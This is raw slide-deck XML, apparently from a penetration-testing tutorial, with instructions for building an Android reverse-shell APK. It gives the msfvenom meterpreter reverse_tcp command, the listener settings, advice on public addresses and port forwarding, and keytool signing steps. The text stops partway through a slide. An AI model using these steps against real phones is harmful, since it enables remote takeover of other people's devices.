              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>MSFvenom is used to make a payload to penetrate the Android emulator.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>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Google Shape;1673;p241"/>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674" name="Google Shape;1674;p241"/>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42900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>By using MSFvenom, we create a payload .apk file. For this, we use the following command:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Terminal: msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP  LPORT=LocalPort R &gt; android_shell.apk</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1675" name="Google Shape;1675;p241"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2822925"/>
            <a:ext cx="9144000" cy="810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5"/>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2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="348" name="Google Shape;348;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274225" y="1017725"/>
            <a:ext cx="7192422" cy="3820974"/>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Google Shape;1680;p24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681" name="Google Shape;1681;p242"/>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0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-p — Payload to be used</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>LHOST — Localhost IP to receive a back connection (Check yours with ifconfig command)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>LPORT — Localhost port on which the connection listen for the victim (we set it to 4444)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>R — Raw format (we select .apk)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Location — To save the file</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1682" name="Google Shape;1682;p242"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1152475"/>
            <a:ext cx="9144000" cy="81000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24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688" name="Google Shape;1688;p243"/>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fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Note: In this command, we have used the local address because we are demonstrating in the local environment. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>To perform in the public network, you should enter your public address in LHOST and enable port forwarding on the router.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>After this command, now you can locate your file on the desktop with the name android_shell.apk.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym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3" name="Google Shape;1693;p244"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1694" name="Google Shape;1694;p244"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1170125"/>
            <a:ext cx="8839201" cy="3137300"/>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245"/>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700" name="Google Shape;1700;p245"/>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fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>After we successfully created the .apk file, we need to sign a certificate because Android mobile devices are not allowed to install apps without the appropriately signed certificate. Android devices only install signed .apk files.</a:t>
            </a:r>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We need to sign the .apk file manually in Kali Linux using:</a:t>
            </a:r>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Keytool (preinstalled)</a:t>
            </a:r>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>jar signer (preinstalled)</a:t>
            </a:r>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>zipalign (need to install)</a:t>
            </a:r>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>To sign the .apk file locally, use these commands:</a:t>
            </a:r>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Terminal: keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000</a:t>
            </a:r>
            <a:endParaRPr sz="5100">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym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1705" name="Google Shape;1705;p24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706" name="Google Shape;1706;p246"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="951375"/>
            <a:ext cx="8520600" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-353060" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>To sign the .apk file locally, use these commands:</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-353060" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Terminal: keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1707" name="Google Shape;1707;p246"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2076701"/>
            <a:ext cx="9144001" cy="2696375"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1712" name="Google Shape;1712;p24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713" name="Google Shape;1713;p247"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="951375"/>
            <a:ext cx="8520600" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-358140" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Terminal:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
